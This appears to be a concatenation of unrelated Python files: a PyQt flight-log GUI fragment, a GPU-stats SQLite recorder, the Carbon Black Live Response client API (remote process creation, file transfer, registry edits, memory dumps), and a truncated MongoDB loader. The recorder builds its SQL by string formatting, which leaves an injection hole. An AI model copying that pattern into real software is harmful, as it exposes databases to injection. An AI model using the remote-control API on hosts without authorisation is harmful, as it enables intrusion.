timebar = TimeBarWidget(self,
f'{flight.departure_icao}-{flight.arrival_icao}',
flight_time,
flight.id,
no_distance=no_distance)
timebar_nextday = TimeBarWidget(self,
f'{flight.departure_icao}-{flight.arrival_icao}',
flight_time, flight.id,
is_next_day=True)
if not arrived_next_day:
if previous_pos_was_nextday:
pos += 1
previous_pos_was_nextday = False
self.__saved_flights_layout.addWidget(QtW.QLabel(departure_date), pos, 0)
self.__saved_flights_layout.addWidget(timebar, pos, actual_departure_hour, 1, flight_time)
else:
previous_pos_was_nextday = True
self.__saved_flights_layout.addWidget(QtW.QLabel(departure_date), pos, 0)
self.__saved_flights_layout.addWidget(QtW.QLabel(arrival_date), pos+1, 0)
self.__saved_flights_layout.addWidget(timebar, pos, actual_departure_hour, 1, (24-actual_departure_hour))
self.__saved_flights_layout.addWidget(timebar_nextday, pos+1, 1, 1, actual_arrival_hour)
pos += 1
def __update_clock(self):
while True:
now = datetime.utcnow()
hour = now.hour
if hour < 10:
hour = f'0{hour}'
minute = now.minute
if minute < 10:
minute = f'0{minute}'
remaining = 60 - now.second
self.__clock.setText(f'{hour}:{minute}Z')
sleep(remaining)
def __show_pending_flights_window(self):
self.__pending_flights_window.update_flight_schedule()
self.__pending_flights_window.show()
def __show_total_stats_window(self):
self.__total_stats_window.update_statistics()
self.__total_stats_window.show()
def __import_data(self):
file_url = QtW.QFileDialog().getOpenFileName()[0]
if not file_url:
return
workbook = load_workbook(file_url)
sheet = workbook.active
i = 6
while dep_city := sheet[f'A{i}'].value:
dep_icao = sheet[f'B{i}'].value
dep_dt = sheet[f'C{i}'].value
arr_city = sheet[f'D{i}'].value
arr_icao = sheet[f'E{i}'].value
            arr_dt = sheet[f'F{i}'].value
aircraft = sheet[f'H{i}'].value
dist = sheet[f'I{i}'].value
flight_time = sheet[f'L{i}'].value
FlightStatistics.create(flight_number='OSX11',
scheduled_departure_date=dep_dt.strftime('%d.%m.%y'),
scheduled_departure_time=dep_dt.strftime('%H:%M'),
actual_arrival_date=arr_dt.strftime('%d.%m.%y'),
actual_departure_time=dep_dt.strftime('%H:%M'),
actual_arrival_time=arr_dt.strftime('%H:%M'),
aircraft=aircraft,
departure_icao=dep_icao,
arrival_icao=arr_icao,
departure_city=dep_city,
arrival_city=arr_city,
flight_time=flight_time.strftime('%H:%M'),
distance=dist)
i += 1
self.render_flights()
def closeEvent(self, event):
if FlightStatistics.has_opened_flight():
self.__close_confirmation_window.show()
event.ignore()
|
gpu_db_recorder.py
|
import json
import os
import sqlite3
import threading
import time
import systemmonitor
DATABASE = 'database.db'
EVENTS_FOLDER = 'events'
def get_db():
db = sqlite3.connect(DATABASE)
db.execute("""
CREATE TABLE IF NOT EXISTS events (
timestmp FLOAT NOT NULL,
description TEXT NOT NULL,
model INTEGER
)
""")
db.execute("""
CREATE TABLE IF NOT EXISTS gpu (
mean_time FLOAT NOT NULL,
id_on_system INTEGER NOT NULL,
identifier VARCHAR NOT NULL,
util FLOAT NOT NULL,
memory_abs FLOAT NOT NULL,
memory_util FLOAT NOT NULL,
temp FLOAT NOT NULL
)
""")
db.commit()
return db
class Event:
def __init__(self,
desc: str,
model: int):
self.desc = desc
self.model = model
self.timestamp = time.time()
def dump(event):
path = os.path.join(EVENTS_FOLDER, f"{event.timestamp}.json")
with open(path, 'w') as outfile:
json.dump(event.__dict__, outfile)
def add_events_to_db():
database = get_db()
for filename in os.listdir(EVENTS_FOLDER):
if filename.endswith(".json"):
full_path = os.path.join(EVENTS_FOLDER, filename)
with open(full_path) as json_file:
event = json.load(json_file)
query = (f"INSERT INTO events VALUES (" \
f"{event['timestamp']}, " \
f"'{event['desc']}', " \
f"{event['model']})")
database.execute(query)
database.commit()
elif not filename.endswith('.gitkeep'):
raise RuntimeWarning(f"Unknown file ending {filename}")
def get_gpu_observer(database):
def add_gpu_state_to_db(state: systemmonitor.DeviceState) -> None:
database.execute((f"INSERT INTO gpu VALUES ("
f"{state.mean_time}, "
f"{state.index}, "
f"'{state.uuid}', "
f"{state.gpu_util}, "
f"{state.mem_used}, "
f"{state.mem_util}, "
f"{state.temp})"))
database.commit()
return add_gpu_state_to_db
def record():
db = get_db()
systemmonitor.run([get_gpu_observer(db)], average_window_sec=60)
class BackgroundMonitoring(object):
def __init__(self):
thread = threading.Thread(target=record, args=())
thread.daemon = True
thread.start()
self.thread = thread
def stop(self):
systemmonitor.exit_event.set()
print("Gave monitoring exit signal. Waiting for thread to join.")
self.thread.join()
print("Background Monitoring Thread joined")
|
live_response_api.py
|
from __future__ import absolute_import
import random
import string
import threading
import time
import logging
from collections import defaultdict
import shutil
from cbapi.errors import TimeoutError, ObjectNotFoundError, ApiError, ServerError
from six import itervalues
from concurrent.futures import ThreadPoolExecutor, as_completed, _base, wait
from cbapi import winerror
from six.moves.queue import Queue
from cbapi.response.models import Sensor
log = logging.getLogger(__name__)
class LiveResponseError(Exception):
def __init__(self, details):
message_list = []
self.details = details
self.win32_error = None
self.decoded_win32_error = ""
# Details object:
# {u'status': u'error', u'username': u'admin', u'sensor_id': 9, u'name': u'kill', u'completion': 1464319733.190924,
# u'object': 1660, u'session_id': 7, u'result_type': u'WinHresult', u'create_time': 1464319733.171967,
# u'result_desc': u'', u'id': 22, u'result_code': 2147942487}
if self.details.get("status") == "error" and self.details.get("result_type") == "WinHresult":
# attempt to decode the win32 error
win32_error_text = "Unknown Win32 error code"
try:
self.win32_error = int(self.details.get("result_code"))
win32_error_text = "Win32 error code 0x%08X" % (self.win32_error,)
self.decoded_win32_error = winerror.decode_hresult(self.win32_error)
if self.decoded_win32_error:
win32_error_text += " ({0})".format(self.decoded_win32_error)
            except Exception:
                pass
finally:
message_list.append(win32_error_text)
self.message = ": ".join(message_list)
def __str__(self):
return self.message
class LiveResponseSession(object):
MAX_RETRY_COUNT = 5
def __init__(self, scheduler, session_id, sensor_id, session_data=None):
self.session_id = session_id
self.sensor_id = sensor_id
self._lr_scheduler = scheduler
self._cb = scheduler._cb
# TODO: refcount should be in a different object in the scheduler
self._refcount = 1
self._closed = False
self.session_data = session_data
self.os_type = self._cb.select(Sensor, self.sensor_id).os_type
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def close(self):
self._lr_scheduler.close_session(self.sensor_id, self.session_id)
self._closed = True
def get_session_archive(self):
response = self._cb.session.get("/api/v1/cblr/session/{0}/archive".format(self.session_id), stream=True)
response.raw.decode_content = True
return response.raw
#
# File operations
#
def get_raw_file(self, file_name, timeout=None, delay=None):
data = {"name": "get file", "object": file_name}
resp = self._lr_post_command(data).json()
file_id = resp.get('file_id', None)
command_id = resp.get('id', None)
self._poll_command(command_id, timeout=timeout, delay=delay)
response = self._cb.session.get("/api/v1/cblr/session/{0}/file/{1}/content".format(self.session_id,
file_id), stream=True)
response.raw.decode_content = True
return response.raw
def get_file(self, file_name):
"""
Retrieve contents of the specified file name
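        :Example:
        >>> with c.select(Sensor, 1).lr_session() as lr_session:
        ...     file_contents = lr_session.get_file('C:\\\\temp\\\\test.txt')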
:param str file_name: Name of the file
:return: Content of the specified file name
:rtype: str
"""
fp = self.get_raw_file(file_name)
content = fp.read()
fp.close()
return content
def delete_file(self, filename):
"""
Delete the specified file name
:param str filename: Name of the file
:return: None
"""
data = {"name": "delete file", "object": filename}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
def put_file(self, infp, remote_filename):
"""
Create a new file on the remote endpoint with the specified data
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... lr_session.put_file('File Data', new_remote_file)
:param str infp: File data to put on the remote endpoint
:param str remote_filename: File name to create on the remote endpoint
:return: None
"""
data = {"name": "put file", "object": remote_filename}
file_id = self._upload_file(infp)
data["file_id"] = file_id
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
def list_directory(self, dir_name):
"""
List the contents of a directory
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... pprint.pprint(lr_session.list_directory('C:\\\\temp\\\\'))
[{u'attributes': [u'DIRECTORY'],
u'create_time': 1471897244,
u'filename': u'.',
u'last_access_time': 1476390670,
u'last_write_time': 1476390670,
u'size': 0},
{u'attributes': [u'DIRECTORY'],
u'create_time': 1471897244,
u'filename': u'..',
u'last_access_time': 1476390670,
u'last_write_time': 1476390670,
u'size': 0},
{u'attributes': [u'ARCHIVE'],
u'create_time': 1476390668,
u'filename': u'test.txt',
u'last_access_time': 1476390668,
u'last_write_time': 1476390668,
u'size': 0}]
:param str dir_name: Directory to list. This parameter should end with '\'
:return: Returns a directory listing
:rtype: list
"""
data = {"name": "directory list", "object": dir_name}
resp = self._lr_post_command(data).json()
command_id = resp.get("id")
return self._poll_command(command_id).get("files", [])
def create_directory(self, dir_name):
"""
Create a directory on the remote endpoint
:param str dir_name: New directory name
:return: None
"""
data = {"name": "create directory", "object": dir_name}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
def path_join(self, *dirnames):
if self.os_type == 1:
# Windows
return "\\".join(dirnames)
else:
# Unix/Mac OS X
return "/".join(dirnames)
def path_islink(self, fi):
# TODO: implement
return False
def walk(self, top, topdown=True, onerror=None, followlinks=False):
"""
Perform a full directory walk with recursion into subdirectories
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... for entry in lr_session.walk(directory_name):
... print(entry)
('C:\\temp\\', [u'dir1', u'dir2'], [u'file1.txt'])
:param str top: Directory to recurse
:param bool topdown: if True, start output from top level directory
:param func onerror: Callback invoked if an error occurs.
This function is called with one argument (the exception that occurred)
:param bool followlinks: Follow symbolic links
:return: Yields tuples in the format (Directory Name, [dirnames], [filenames]); a usage sketch follows this class definition
:rtype: tuple
"""
try:
allfiles = self.list_directory(self.path_join(top, "*"))
except Exception as err:
if onerror is not None:
onerror(err)
return
dirnames = []
filenames = []
for fn in allfiles:
if "DIRECTORY" in fn["attributes"]:
if fn["filename"] not in (".", ".."):
dirnames.append(fn)
else:
filenames.append(fn)
if topdown:
yield top, [fn["filename"] for fn in dirnames], [fn["filename"] for fn in filenames]
for name in dirnames:
new_path = self.path_join(top, name["filename"])
if followlinks or not self.path_islink(new_path):
for x in self.walk(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, [fn["filename"] for fn in dirnames], [fn["filename"] for fn in filenames]
#
# Process operations
#
def kill_process(self, pid):
"""
Terminate a process on the remote endpoint
:param pid: Process ID to terminate
:return: True if success, False if failure
:rtype: bool
"""
data = {"name": "kill", "object": pid}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
try:
self._poll_command(command_id, timeout=10, delay=0.1)
except TimeoutError:
return False
return True
def create_process(self, command_string, wait_for_output=True, remote_output_file_name=None,
working_directory=None, wait_timeout=30):
"""
Create a new process with the specified command string.
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... print(lr_session.create_process(r'cmd.exe /c "ping.exe 192.168.1.1"'))
Pinging 192.168.1.1 with 32 bytes of data:
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
:param str command_string: command string used for the create process operation
:param bool wait_for_output: Block on output from the new process
:param str remote_output_file_name: The remote output file name used for process output
:param str working_directory: The working directory of the create process operation
:param int wait_timeout: Time out used for this live response command
:return: returns the output of the command string
:rtype: str
"""
# process is:
# - create a temporary file name
# - create the process, writing output to a temporary file
# - wait for the process to complete
# - get the temporary file from the endpoint
# - delete the temporary file
data = {"name": "create process", "object": command_string, "wait": False}
if wait_for_output and not remote_output_file_name:
randfilename = self._random_file_name()
data["output_file"] = randfilename
if working_directory:
data["working_directory"] = working_directory
if remote_output_file_name:
data["output_file"] = remote_output_file_name
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if wait_for_output:
self._poll_command(command_id, timeout=wait_timeout)
# now the file is ready to be read
file_content = self.get_file(data["output_file"])
# delete the file
self._lr_post_command({"name": "delete file", "object": data["output_file"]})
return file_content
def list_processes(self):
"""
List currently running processes
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... print(lr_session.list_processes()[0])
{u'command_line': u'',
u'create_time': 1476260500,
u'parent': 0,
u'parent_guid': u'00000001-0000-0000-0000-000000000000',
u'path': u'',
u'pid': 4,
u'proc_guid': u'00000001-0000-0004-01d2-2461a85e4546',
u'sid': u's-1-5-18',
u'username': u'NT AUTHORITY\\SYSTEM'}
:return: returns a list of running processes
:rtype: list
"""
data = {"name": "process list"}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
return self._poll_command(command_id).get("processes", [])
#
# Registry operations
#
# returns dictionary with 2 entries ("values" and "sub_keys")
# "values" is a list containing a dictionary for each registry value in the key
# "sub_keys" is a list containing one entry for each sub_key
def list_registry_keys_and_values(self, regkey):
"""
Enumerate subkeys and values of the specified registry key.
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... pprint.pprint(lr_session.list_registry_keys_and_values('HKLM\\SYSTEM\\CurrentControlSet\\services\\ACPI'))
{'sub_keys': [u'Parameters', u'Enum'],
'values': [{u'value_data': 0,
u'value_name': u'Start',
u'value_type': u'REG_DWORD'},
{u'value_data': 1,
u'value_name': u'Type',
u'value_type': u'REG_DWORD'},
{u'value_data': 3,
u'value_name': u'ErrorControl',
u'value_type': u'REG_DWORD'},
{u'value_data': u'system32\\drivers\\ACPI.sys',
u'value_name': u'ImagePath',
u'value_type': u'REG_EXPAND_SZ'},
{u'value_data': u'Microsoft ACPI Driver',
u'value_name': u'DisplayName',
u'value_type': u'REG_SZ'},
{u'value_data': u'Boot Bus Extender',
u'value_name': u'Group',
u'value_type': u'REG_SZ'},
{u'value_data': u'acpi.inf_x86_neutral_ddd3c514822f1b21',
u'value_name': u'DriverPackageId',
u'value_type': u'REG_SZ'},
{u'value_data': 1,
u'value_name': u'Tag',
u'value_type': u'REG_DWORD'}]}
:param str regkey: The registry key to enumerate
:return: returns a dictionary with 2 keys (sub_keys and values)
:rtype: dict
"""
data = {"name": "reg enum key", "object": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
results = {}
enum_data = self._poll_command(command_id)
results["values"] = enum_data.get("values", [])
results["sub_keys"] = enum_data.get("sub_keys", [])
return results
# returns a list containing a dictionary for each registry value in the key
def list_registry_keys(self, regkey):
"""
Enumerate all registry values from the specified registry key.
:param regkey: The registry key to enumerate
:return: returns a list of values
:rtype: list
"""
data = {"name": "reg enum key", "object": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
return self._poll_command(command_id).get("values", [])
# returns a dictionary with the registry value
def get_registry_value(self, regkey):
"""
Returns the associated value of the specified registry key
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... pprint.pprint(lr_session.get_registry_value('HKLM\\SYSTEM\\CurrentControlSet\\services\\ACPI\\Start'))
{u'value_data': 0, u'value_name': u'Start', u'value_type': u'REG_DWORD'}
:param str regkey: The registry key to retrieve
:return: Returns a dictionary with keys of: value_data, value_name, value_type
:rtype: dict
"""
data = {"name": "reg query value", "object": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
return self._poll_command(command_id).get("value", {})
def set_registry_value(self, regkey, value, overwrite=True, value_type=None):
"""
Set a registry value of the specified registry key
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... lr_session.set_registry_value('HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\ACPI\\\\testvalue', 1)
:param str regkey: The registry key to set
:param obj value: The value data
:param bool overwrite: Overwrite value if True
:param str value_type: The type of value. Examples: REG_DWORD, REG_MULTI_SZ, REG_SZ
:return: None
"""
if value_type is None:
if type(value) == int:
value_type = "REG_DWORD"
elif type(value) == list:
value_type = "REG_MULTI_SZ"
# elif type(value) == bytes:
# value_type = "REG_BINARY"
else:
value_type = "REG_SZ"
value = str(value)
data = {"name": "reg set value", "object": regkey, "overwrite": overwrite, "value_type": value_type,
"value_data": value}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
def create_registry_key(self, regkey):
"""
Create a new registry key
:param str regkey: The registry key to create
:return: None
"""
data = {"name": "reg create key", "object": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
def delete_registry_key(self, regkey):
"""
Delete a registry key
:param str regkey: The registry key to delete
:return: None
"""
data = {"name": "reg delete key", "object": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
def delete_registry_value(self, regkey):
"""
Delete a registry value
:param str regkey: the registry value to delete
:return: None
"""
data = {"name": "reg delete value", "object": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
#
# Physical memory capture
#
def memdump(self, local_filename, remote_filename=None, compress=True):
dump_object = self.start_memdump(remote_filename=remote_filename, compress=compress)
dump_object.wait()
dump_object.get(local_filename)
dump_object.delete()
def start_memdump(self, remote_filename=None, compress=True):
if not remote_filename:
remote_filename = self._random_file_name()
data = {"name": "memdump", "object": remote_filename, "compress": compress}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if compress:
remote_filename += ".zip"
return LiveResponseMemdump(self, command_id, remote_filename)
def _random_file_name(self):
randfile = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(12)])
if self.os_type == 1:
workdir = 'c:\\windows\\carbonblack'
else:
workdir = '/tmp'
return self.path_join(workdir, 'cblr.%s.tmp' % (randfile,))
def _poll_command(self, command_id, **kwargs):
return poll_status(self._cb, "/api/v1/cblr/session/{0}/command/{1}".format(self.session_id, command_id),
**kwargs)
def _upload_file(self, fp):
resp = self._cb.session.post("/api/v1/cblr/session/{0}/file".format(self.session_id), files={"file": fp}).json()
return resp.get('id')
def _lr_post_command(self, data):
retries = self.MAX_RETRY_COUNT
if "name" in data and data["name"] not in self.session_data["supported_commands"]:
raise ApiError("Command {0} not supported by this sensor".format(data["name"]))
while retries:
try:
data["session_id"] = self.session_id
resp = self._cb.post_object("/api/v1/cblr/session/{0}/command".format(self.session_id), data)
except ObjectNotFoundError as e:
if e.message.startswith("Sensor") or e.message.startswith("Session"):
self.session_id, self.session_data = self._lr_scheduler._get_or_create_session(self.sensor_id)
retries -= 1
continue
else:
raise ApiError("Received 404 error from server: {0}".format(e.message))
else:
return resp
raise TimeoutError(message="Command {0} failed after {1} retries".format(data["name"], self.MAX_RETRY_COUNT))
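# Illustrative sketch (not part of the original module): using walk() much like os.walk()
# to collect the full path of every file beneath a directory on the endpoint. The CbAPI
# object `cb`, the sensor id and the start directory are hypothetical.
def _example_collect_remote_files(cb, sensor_id, start_dir):
    """Return a list of full paths of all files found beneath start_dir."""
    collected = []
    with cb.select(Sensor, sensor_id).lr_session() as lr_session:
        for dirpath, _dirnames, filenames in lr_session.walk(start_dir):
            for filename in filenames:
                # path_join picks '\\' or '/' based on the sensor's OS type
                collected.append(lr_session.path_join(dirpath, filename))
    return collected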
class LiveResponseMemdump(object):
def __init__(self, lr_session, memdump_id, remote_filename):
self.lr_session = lr_session
self.memdump_id = memdump_id
self.remote_filename = remote_filename
self._done = False
self._error = None
def get(self, local_filename):
if not self._done:
self.wait()
if self._error:
raise self._error
src = self.lr_session.get_raw_file(self.remote_filename, timeout=3600, delay=5)
dst = open(local_filename, "wb")
shutil.copyfileobj(src, dst)
dst.close()
def wait(self):
self.lr_session._poll_command(self.memdump_id, timeout=3600, delay=5)
self._done = True
def delete(self):
self.lr_session.delete_file(self.remote_filename)
def jobrunner(callable, cb, sensor_id):
with cb.select(Sensor, sensor_id).lr_session() as sess:
return callable(sess)
class WorkItem(object):
def __init__(self, fn, sensor_id):
self.fn = fn
if isinstance(sensor_id, Sensor):
self.sensor_id = sensor_id.id
else:
self.sensor_id = int(sensor_id)
self.future = _base.Future()
class CompletionNotification(object):
def __init__(self, sensor_id):
self.sensor_id = sensor_id
class WorkerStatus(object):
def __init__(self, sensor_id, status="ready", exception=None):
self.sensor_id = sensor_id
self.status = status
self.exception = exception
class JobWorker(threading.Thread):
def __init__(self, cb, sensor_id, result_queue):
super(JobWorker, self).__init__()
self.cb = cb
self.sensor_id = sensor_id
self.job_queue = Queue()
self.lr_session = None
self.result_queue = result_queue
def run(self):
try:
self.lr_session = self.cb.live_response.request_session(self.sensor_id)
self.result_queue.put(WorkerStatus(self.sensor_id, status="ready"))
while True:
work_item = self.job_queue.get(block=True)
if not work_item:
self.job_queue.task_done()
return
self.run_job(work_item)
self.result_queue.put(CompletionNotification(self.sensor_id))
self.job_queue.task_done()
except Exception as e:
self.result_queue.put(WorkerStatus(self.sensor_id, status="error", exception=e))
finally:
if self.lr_session:
self.lr_session.close()
self.result_queue.put(WorkerStatus(self.sensor_id, status="exiting"))
def run_job(self, work_item):
try:
work_item.future.set_result(work_item.fn(self.lr_session))
except Exception as e:
work_item.future.set_exception(e)
class LiveResponseJobScheduler(threading.Thread):
daemon = True
def __init__(self, cb, max_workers=10):
super(LiveResponseJobScheduler, self).__init__()
self._cb = cb
self._job_workers = {}
self._idle_workers = set()
self._unscheduled_jobs = defaultdict(list)
self._max_workers = max_workers
self.schedule_queue = Queue()
def run(self):
log.debug("Starting Live Response Job Scheduler")
while True:
log.debug("Waiting for item on Scheduler Queue")
item = self.schedule_queue.get(block=True)
log.debug("Got item: {0}".format(item))
if isinstance(item, WorkItem):
# new WorkItem available
self._unscheduled_jobs[item.sensor_id].append(item)
elif isinstance(item, CompletionNotification):
# job completed
self._idle_workers.add(item.sensor_id)
elif isinstance(item, WorkerStatus):
if item.status == "error":
log.error("Error encountered by JobWorker[{0}]: {1}".format(item.sensor_id,
item.exception))
elif item.status == "exiting":
log.debug("JobWorker[{0}] has exited, waiting...".format(item.sensor_id))
self._job_workers[item.sensor_id].join()
log.debug("JobWorker[{0}] deleted".format(item.sensor_id))
del self._job_workers[item.sensor_id]
try:
self._idle_workers.remove(item.sensor_id)
except KeyError:
pass
elif item.status == "ready":
log.debug("JobWorker[{0}] now ready to accept jobs, session established".format(item.sensor_id))
self._idle_workers.add(item.sensor_id)
else:
log.debug("Unknown status from JobWorker[{0}]: {1}".format(item.sensor_id, item.status))
else:
log.debug("Received unknown item on the scheduler Queue, exiting")
# exiting the scheduler if we get None
# TODO: wait for all worker threads to exit
return
self._schedule_jobs()
def _schedule_jobs(self):
log.debug("Entering scheduler")
# First, see if there are new jobs to schedule on idle workers.
self._schedule_existing_workers()
# If we have jobs scheduled to run on sensors with no current associated worker, let's spawn new ones.
if set(self._unscheduled_jobs.keys()) - self._idle_workers:
self._cleanup_idle_workers()
self._spawn_new_workers()
self._schedule_existing_workers()
def _cleanup_idle_workers(self, max=None):
if not max:
max = self._max_workers
for sensor in list(self._idle_workers)[:max]:
log.debug("asking worker for sensor id {0} to exit".format(sensor))
self._job_workers[sensor].job_queue.put(None)
def _schedule_existing_workers(self):
log.debug("There are idle workers for sensor ids {0}".format(self._idle_workers))
intersection = self._idle_workers.intersection(set(self._unscheduled_jobs.keys()))
log.debug("{0} jobs ready to execute in existing execution slots".format(len(intersection)))
for sensor in intersection:
item = self._unscheduled_jobs[sensor].pop(0)
self._job_workers[sensor].job_queue.put(item)
self._idle_workers.remove(item.sensor_id)
self._cleanup_unscheduled_jobs()
def _cleanup_unscheduled_jobs(self):
marked_for_deletion = []
for k in self._unscheduled_jobs.keys():
if len(self._unscheduled_jobs[k]) == 0:
marked_for_deletion.append(k)
for k in marked_for_deletion:
del self._unscheduled_jobs[k]
def submit_job(self, work_item):
self.schedule_queue.put(work_item)
def _spawn_new_workers(self):
if len(self._job_workers) >= self._max_workers:
return
schedule_max = self._max_workers - len(self._job_workers)
sensors = [s for s in self._cb.select(Sensor) if s.id in self._unscheduled_jobs
and s.id not in self._job_workers
and s.status == "Online"]
sensors_to_schedule = sorted(sensors, key=lambda x: x.next_checkin_time)[:schedule_max]
log.debug("Spawning new workers to handle these sensors: {0}".format(sensors_to_schedule))
for sensor in sensors_to_schedule:
log.debug("Spawning new JobWorker for sensor id {0}".format(sensor.id))
self._job_workers[sensor.id] = JobWorker(self._cb, sensor.id, self.schedule_queue)
self._job_workers[sensor.id].start()
class LiveResponseSessionManager(object):
def __init__(self, cb, timeout=30, keepalive_sessions=False):
self._timeout = timeout
self._cb = cb
self._sessions = {}
self._session_lock = threading.RLock()
self._keepalive_sessions = keepalive_sessions
if keepalive_sessions:
self._cleanup_thread = threading.Thread(target=self._session_keepalive_thread)
self._cleanup_thread.daemon = True
self._cleanup_thread.start()
self._job_scheduler = None
def submit_job(self, job, sensor):
if self._job_scheduler is None:
# spawn the scheduler thread
self._job_scheduler = LiveResponseJobScheduler(self._cb)
self._job_scheduler.start()
work_item = WorkItem(job, sensor)
self._job_scheduler.submit_job(work_item)
return work_item.future
def _session_keepalive_thread(self):
log.debug("Starting Live Response scheduler cleanup task")
while True:
time.sleep(self._timeout)
delete_list = []
with self._session_lock:
for session in itervalues(self._sessions):
if session._refcount == 0:
delete_list.append(session.sensor_id)
else:
try:
self._send_keepalive(session.session_id)
except ObjectNotFoundError:
log.debug("Session {0} for sensor {1} not valid any longer, removing from cache"
.format(session.session_id, session.sensor_id))
delete_list.append(session.sensor_id)
except:
log.debug("Keepalive on session {0} (sensor {1}) failed with unknown error, removing from cache"
.format(session.session_id, session.sensor_id))
delete_list.append(session.sensor_id)
for sensor_id in delete_list:
self._close_session(self._sessions[sensor_id].session_id)
del self._sessions[sensor_id]
def request_session(self, sensor_id):
if self._keepalive_sessions:
with self._session_lock:
if sensor_id in self._sessions:
session = self._sessions[sensor_id]
self._sessions[sensor_id]._refcount += 1
else:
session_id, session_data = self._get_or_create_session(sensor_id)
session = LiveResponseSession(self, session_id, sensor_id, session_data=session_data)
self._sessions[sensor_id] = session
else:
session_id, session_data = self._get_or_create_session(sensor_id)
session = LiveResponseSession(self, session_id, sensor_id, session_data=session_data)
return session
def close_session(self, sensor_id, session_id):
if self._keepalive_sessions:
with self._session_lock:
try:
self._sessions[sensor_id]._refcount -= 1
except KeyError:
pass
else:
self._close_session(session_id)
def _send_keepalive(self, session_id):
log.debug("Sending keepalive message for session id {0}".format(session_id))
self._cb.get_object("/api/v1/cblr/session/{0}/keepalive".format(session_id))
def _get_or_create_session(self, sensor_id):
sensor_sessions = [s for s in self._cb.get_object("/api/v1/cblr/session")
if s["sensor_id"] == sensor_id and s["status"] in ("pending", "active")]
if len(sensor_sessions) > 0:
session_id = sensor_sessions[0]["id"]
else:
session_id = self._create_session(sensor_id)
try:
res = poll_status(self._cb, "/api/v1/cblr/session/{0}".format(session_id), desired_status="active")
except ObjectNotFoundError:
# the Cb server will return a 404 if we don't establish a session in time, so convert this to a "timeout"
raise TimeoutError(uri="/api/v1/cblr/session/{0}".format(session_id),
message="Could not establish session with sensor {0}".format(sensor_id),
error_code=404)
else:
return session_id, res
def _close_session(self, session_id):
try:
session_data = self._cb.get_object("/api/v1/cblr/session/{0}".format(session_id))
session_data["status"] = "close"
self._cb.put_object("/api/v1/cblr/session/{0}".format(session_id), session_data)
except:
pass
def _create_session(self, sensor_id):
response = self._cb.post_object("/api/v1/cblr/session", {"sensor_id": sensor_id}).json()
session_id = response["id"]
return session_id
class GetFileJob(object):
def __init__(self, file_name):
self._file_name = file_name
def run(self, session):
return session.get_file(self._file_name)
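# Illustrative sketch (not part of the original module): fanning a Live Response job out
# to several sensors through the job scheduler and collecting results as the futures
# complete. The CbAPI object `cb`, the sensor ids and the file name are hypothetical.
def _example_collect_file_from_sensors(cb, sensor_ids, file_name):
    """Fetch file_name from each sensor and return {sensor_id: contents or exception}."""
    job = GetFileJob(file_name)
    futures = {cb.live_response.submit_job(job.run, sensor_id): sensor_id
               for sensor_id in sensor_ids}
    results = {}
    for future in as_completed(futures):
        sensor_id = futures[future]
        try:
            results[sensor_id] = future.result()
        except Exception as exc:  # e.g. LiveResponseError or TimeoutError
            results[sensor_id] = exc
    return results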
# TODO: adjust the polling interval and also provide a callback function to report progress
def poll_status(cb, url, desired_status="complete", timeout=None, delay=None):
start_time = time.time()
status = None
if not timeout:
timeout = 120
if not delay:
delay = 0.5
while status != desired_status and time.time() - start_time < timeout:
res = cb.get_object(url)
if res["status"] == desired_status:
return res
elif res["status"] == "error":
raise LiveResponseError(res)
else:
time.sleep(delay)
raise TimeoutError(uri=url, message="timeout polling for Live Response")
if __name__ == "__main__":
from cbapi.response import CbEnterpriseResponseAPI
import logging
root = logging.getLogger()
root.addHandler(logging.StreamHandler())
logging.getLogger("cbapi").setLevel(logging.DEBUG)
c = CbEnterpriseResponseAPI()
j = GetFileJob(r"c:\test.txt")
with c.select(Sensor, 3).lr_session() as lr_session:
file_contents = lr_session.get_file(r"c:\test.txt")
future = c.live_response.submit_job(j.run, 3)
wait([future, ])
print(future.result())
|
load_complete_data.py
|
import os
import src.mongoDBI as mongoDBI
import src.constants as constants
import src.utils as utils
import glob
import src.parse_grb_files as parse_grb_files
from multiprocessing import Process
from datetime import datetime, timedelta, date
# ---------------------------------------- #
class buffer:
buffer = None
max_buffer_count = 25
dbi = None
def __init__(self , db_name ):
self.dbi = mongoDBI.mongoDBI ( db_name )
self.buffer = {}
for t in constants.mongo_db_tables:
self.buffer[ t ] = [ ]
def insert_to_buffer(self, table, dict):
self.buffer[ table ].append (dict)
return
def write_buffer(self):
cur_len = len (self.buffer[ constants.mongo_db_tables[ 0 ] ])
if cur_len < self.max_buffer_count:
return;
self.dbi.insert_bulk (self.buffer)
# Empty buffer
for t in constants.mongo_db_tables:
self.buffer[ t ] = [ ]
return
# data_map : dictionary
# 1st entry is the date or year_week id
def insert_to_db(self, data_map, label=constants.label_date):
if data_map is None or len(data_map) == 0 :
return
id = data_map[ label ]
data_map.pop (label, None)
for table, data in data_map.items():
# print 'in insert to db... table:'+table
key_label = label
key_contents = id
value_label = constants.label_value
value_contents = data
